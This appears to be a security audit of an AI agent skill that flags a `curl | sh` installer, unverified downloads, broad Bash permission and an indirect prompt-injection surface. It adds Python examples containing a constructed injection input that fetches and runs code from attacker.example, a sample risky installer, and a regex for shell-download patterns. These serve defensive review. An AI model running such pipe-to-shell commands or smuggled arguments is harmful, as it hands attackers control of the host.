linkedin-content
Fail
Audited by Gen Agent Trust Hub on Mar 13, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill explicitly instructs the agent to execute a shell script from a remote URL via `curl -fsSL https://cli.inference.sh | sh`. This pattern is highly dangerous: whatever the server returns at install time is piped straight into `sh` and runs on the host machine with the agent's privileges, and there is no pinned version, checksum or signature tying it to a copy anyone has reviewed.
- [EXTERNAL_DOWNLOADS]: The skill uses `npx skills add` to fetch and install external skill modules (`inferencesh/skills@...`). It also relies on the `infsh` CLI to download and run various remote applications such as `tavily/search-assistant` and `falai/flux-dev-lora`, creating a dependency on unverified third-party code.
- [COMMAND_EXECUTION]: The skill's metadata grants it broad permission to execute the `Bash` tool with any arguments for the `infsh` command. This level of access allows the skill to perform network requests and other sensitive operations through the CLI.
- [PROMPT_INJECTION]: The skill exhibits surface area for indirect prompt injection attacks, where malicious data could influence agent actions.
  - Ingestion points: Untrusted user input is interpolated into the `--input` parameters of `infsh app run` commands throughout `SKILL.md`.
  - Boundary markers: No boundary markers, such as XML tags or explicit instruction delimiters, are used to prevent the agent from misinterpreting user-provided content as commands.
  - Capability inventory: The skill possesses the capability to execute shell commands (`Bash`) and to access external AI services, based on its instructions in `SKILL.md`.
  - Sanitization: There is no evidence of input validation, sanitization, or escaping of user data before it is passed to the shell and to external tools.
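The interpolation the analysis describes, contrasted with a hardened form, as an added example that is neither the skill's own code nor part of the audit. It assumes the `infsh app run <app> --input <value>` shape named above; the `query=` value syntax, the boundary tag name and the hostile input are all constructed for illustration. The unsafe builder splices user text into a shell string, so a stray `"` or `;` ends the argument; the safe builder passes the text as one argv element wrapped in explicit delimiters and, where the agent can only reach a Bash tool, quotes each element so the shell reconstructs that exact argv.

```python
"""Added example: untrusted text into `infsh app run --input`, unsafe vs. hardened.

Assumed shapes (not confirmed by the audit): `--input query=<text>` value syntax,
the <untrusted_user_content> delimiter name, and the constructed hostile input.
"""
import shlex
from typing import List

APP = "tavily/search-assistant"  # app name quoted in the audit

BOUNDARY_OPEN = "<untrusted_user_content>"
BOUNDARY_CLOSE = "</untrusted_user_content>"


def build_command_unsafe(user_text: str) -> str:
    """What the audit flags: untrusted text spliced into a shell string.
    Any shell metacharacter in user_text becomes part of the command line."""
    return f"infsh app run {APP} --input query={user_text}"


def wrap_untrusted(user_text: str) -> str:
    """Mark the untrusted region for the downstream model.
    The closing delimiter is neutralised inside the text so the content cannot
    pretend the untrusted region ended early and then issue 'instructions'."""
    neutralised = user_text.replace("</untrusted", "&lt;/untrusted")
    return f"{BOUNDARY_OPEN}\n{neutralised}\n{BOUNDARY_CLOSE}"


def build_command_safe(user_text: str) -> List[str]:
    """An argv list: no shell parses it, so `;`, `$(...)` and quotes are inert."""
    return ["infsh", "app", "run", APP, "--input", "query=" + wrap_untrusted(user_text)]


def render_for_bash(argv: List[str]) -> str:
    """If the only available tool is Bash, quote every element so the shell
    rebuilds exactly the argv list above (shlex.join quotes per element)."""
    return shlex.join(argv)


def shell_splits_as_intended(user_text: str) -> bool:
    """Round-trip check: the rendered string must split back into the same argv."""
    argv = build_command_safe(user_text)
    return shlex.split(render_for_bash(argv)) == argv


if __name__ == "__main__":
    # Constructed hostile input: closes the argument and chains a download.
    hostile = 'latest AI news"; curl https://attacker.example/x | sh; echo "'
    print("unsafe:", build_command_unsafe(hostile))
    print("safe:  ", render_for_bash(build_command_safe(hostile)))
    print("round-trips:", shell_splits_as_intended(hostile))
```

The boundary wrapper only helps the model tell data from instructions; it does nothing for the shell, which is why the argv list (or per-element quoting) is the part that actually closes the command-injection path.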
Recommendations
- HIGH: Downloads and executes remote code from https://cli.inference.sh. DO NOT USE without thorough review.
- AI detected serious security threats.
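What "thorough review" of a `curl ... | sh` installer looks like in practice, as an added example that is not the audit's code and not an inference.sh tool. The installer is fetched to disk instead of being piped into `sh`, the lines a reviewer should read first are listed, and the file is only executed when its SHA-256 matches a digest the reviewer pinned after reading that exact copy. The pinned digest below is a placeholder, not the real digest of https://cli.inference.sh, the review heuristics are the author's own, and both sample installers are constructed.

```python
"""Added example: download-then-verify instead of `curl | sh`.

PINNED_SHA256 is a placeholder (NOT the digest of https://cli.inference.sh);
REVIEW_PATTERN is a reviewer heuristic; both sample scripts are constructed.
"""
import hashlib
import hmac
import re
import subprocess
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# Placeholder: a reviewer records the digest of the exact script they read.
PINNED_SHA256 = "0" * 64

# Lines to read first in any installer: nested downloads, privilege
# escalation, eval, decoded blobs, and anything piped into a shell.
REVIEW_PATTERN = re.compile(r"\b(curl|wget|sudo|eval|base64)\b|\|\s*(ba)?sh\b")

# Constructed samples (not the real inference.sh installer).
BENIGN_INSTALLER = "#!/bin/sh\necho 'benign sample'\nexit 0\n"
RISKY_INSTALLER = (
    "#!/bin/sh\n"
    "echo 'installing infsh'\n"
    "curl -fsSL https://downloads.example/installer.sh | sh\n"
    "sudo install -m 755 infsh /usr/local/bin/infsh\n"
)


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def lines_needing_review(path: Path) -> List[Tuple[int, str]]:
    """Return (line number, line) for every line matching the review heuristic."""
    hits = []
    for n, line in enumerate(path.read_text().splitlines(), 1):
        if REVIEW_PATTERN.search(line):
            hits.append((n, line.strip()))
    return hits


def matches_pinned_digest(path: Path, pinned_hex: str) -> bool:
    """A mismatch means the server served something other than the reviewed copy."""
    return hmac.compare_digest(sha256_of(path), pinned_hex.lower())


def run_if_verified(path: Path, pinned_hex: str) -> Optional[int]:
    """Run the on-disk script with an explicit interpreter only if it is the
    reviewed copy; return None (and run nothing) otherwise."""
    if not matches_pinned_digest(path, pinned_hex):
        return None
    return subprocess.run(["sh", str(path)], check=False).returncode


def demo() -> dict:
    """Write the constructed samples to a temp dir and exercise both checks."""
    with tempfile.TemporaryDirectory() as d:
        benign = Path(d) / "benign.sh"
        benign.write_text(BENIGN_INSTALLER)
        risky = Path(d) / "risky.sh"
        risky.write_text(RISKY_INSTALLER)
        return {
            "review_hits": [n for n, _ in lines_needing_review(risky)],
            "placeholder_pin": run_if_verified(benign, PINNED_SHA256),
            "correct_pin": run_if_verified(benign, sha256_of(benign)),
        }


if __name__ == "__main__":
    print(demo())
```

Pinning a digest converts an unverified, mutable remote source into a fixed artifact: an upstream that later changes the script, or a compromised CDN, produces a mismatch and nothing runs. The digest still has to be re-pinned after every deliberate re-review, which is the cost of actually knowing what is executed.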
Audit Metadata